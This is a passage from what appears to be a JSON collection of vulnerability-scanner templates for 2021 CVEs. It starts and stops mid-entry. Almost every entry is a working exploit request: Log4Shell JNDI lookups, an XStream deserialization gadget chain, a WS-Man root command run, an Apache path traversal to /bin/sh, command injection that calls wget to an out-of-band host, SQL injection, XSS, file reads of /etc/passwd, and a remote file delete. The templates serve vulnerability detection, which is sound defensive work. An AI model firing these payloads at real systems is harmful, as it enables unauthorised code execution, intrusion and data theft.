xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n  <s:Header>\n    <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n    <a:ReplyTo>\n      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n    </a:ReplyTo>\n    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n    <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n    <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <w:OptionSet s:mustUnderstand=\"true\"/>\n    <w:SelectorSet>\n      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n    </w:SelectorSet>\n  </s:Header>\n  <s:Body>\n    <p:ExecuteScript_INPUT\n      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n      <p:Script>aWQ=</p:Script>\n      <p:Arguments/>\n      <p:timeout>0</p:timeout>\n      <p:b64encoded>true</p:b64encoded>\n    </p:ExecuteScript_INPUT>\n  </s:Body>\n</s:Envelope>\n"],"matchers":[{"type":"word","words":["<p:StdOut>","uid=0(root) gid=0(root) groups=0"],"condition":"and"}]}]},{"id":"CVE-2021-27519","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3019","info":{"name":"ffay lanproxy Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../conf/config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"],"condition":"and"},{"type":"word","part":"body","words":["config.admin.username","config.admin.password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-40971","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42663","info":{"name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</i><script>alert(document.domain)</script></div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24146","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["mec-events","text/csv"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24917","info":{"name":"WordPress WPS Hide Login <1.9.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nReferer: something\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["redirect_to=%2Fwp-admin%2Fsomething&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n    \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: <a href=\"/\">"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-36380","info":{"name":"Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi/networkDiag.cgi HTTP/1.1\nHost: {{Hostname}}\n\ncommand=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-3293","info":{"name":"emlog 5.3.1 Path Disclosure","severity":"medium"},"requests":[{"raw":["GET /t/index.php?action[]=aaaa HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>Warning</b>","on line","expects parameter"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24165","info":{"name":"WordPress Ninja Forms <3.4.34 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 302","contains(header_2, 'Location: https://interact.sh?client_id=1')"],"condition":"and"}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\n        <owner/>\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\n          <stubHandlers>\n            <entry>\n              <method>\n                <class>java.lang.Comparable</class>\n                <name>compareTo</name>\n                <parameter-types>\n                  <class>java.lang.Object</class>\n                </parameter-types>\n              </method>\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\n                  <indices>\n                    <int>0</int>\n                  </indices>\n                  <getters>\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\n                  </getters>\n                  <accessors>\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\n                        <type>int</type>\n                        <field>\n                          <name>hash</name>\n                          <clazz>java.lang.String</clazz>\n                        </field>\n                      </val_-getter>\n                      <val_-isListType>false</val_-isListType>\n                      <val_-n>\n                        <namespaceURI/>\n                        <localPart>hash</localPart>\n                        <prefix/>\n                      </val_-n>\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\n                        <type>java.lang.String</type>\n                        <method>\n                          <class>javax.naming.InitialContext</class>\n                          <name>doLookup</name>\n                          <parameter-types>\n                            <class>java.lang.String</class>\n                          </parameter-types>\n                        </method>\n                      </val_-setter>\n                      <outer-class>\n                        <propertySetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field>\n                                <name>serialPersistentFields</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>java.util.Comparator</type>\n                              <field>\n                                <name>CASE_INSENSITIVE_ORDER</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>long</type>\n                              <field>\n                                <name>serialVersionUID</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[C</type>\n                              <field>\n                                <name>value</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>int</type>\n                              <field reference='../../../../../val_-getter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                        </propertySetters>\n                        <propertyGetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>java.util.Comparator</type>\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>long</type>\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[C</type>\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\n                          </entry>\n                        </propertyGetters>\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\n                        <contentClass>java.lang.String</contentClass>\n                        <elementDeclaredTypes/>\n                      </outer-class>\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                  </accessors>\n                  <wrapper>java.lang.Object</wrapper>\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\n                  <dynamicWrapper>false</dynamicWrapper>\n                </bodyBuilder>\n                <isOneWay>false</isOneWay>\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\n            </entry>\n          </stubHandlers>\n          <clientConfig>false</clientConfig>\n        </databinding>\n        <methodHandlers>\n          <entry>\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n              <owner reference='../../../..'/>\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\n              <isVoid>false</isVoid>\n              <isOneway>false</isOneway>\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n          </entry>\n        </methodHandlers>\n      </handler>\n    </dynamic-proxy>\n    <string>ldap://{{interactsh-url}}/#evil</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24335","info":{"name":"WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["<str name=\"status\">OK</str>"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-21816","info":{"name":"D-Link DIR-3040 1.13B03 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/messages"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["syslog:","admin","/etc_ro/lighttpd/www"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-29441","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: Nacos-Server\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 403","status_code_2 == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body_1, 'Forbidden')","body_2 == 'true'"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44228","info":{"name":"Apache Log4j2 Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"},{"type":"regex","group":1,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-21234","info":{"name":"Spring Boot Actuator Logview Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44451","info":{"name":"Apache Superset <=1.3.2 - Default Login","severity":"medium"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&username={{username}}&password={{password}}\n","GET /dashboard/list/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["session"]},{"type":"word","part":"body_3","words":["DashboardFilterStateRestApi"]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" type=\"hidden\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25052","info":{"name":"WordPress Button Generator <2.3.3 - Remote File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46424","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical"},"requests":[{"raw":["GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","DELETE /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"]}]}]},{"id":"CVE-2021-32819","info":{"name":"Nodejs Squirrelly - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Wget"]}]}]},{"id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-41773-POC"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-46387","info":{"name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iMg src=x onerror=\"prompt(document.domain)\"><form>","Entry Error"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43734","info":{"name":"kkFileview v4.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd","{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26723","info":{"name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27330","info":{"name":"Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/calendar/calendar_form.php/\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>TriConsole.com - PHP Calendar Date Picker</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24291","info":{"name":"WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site 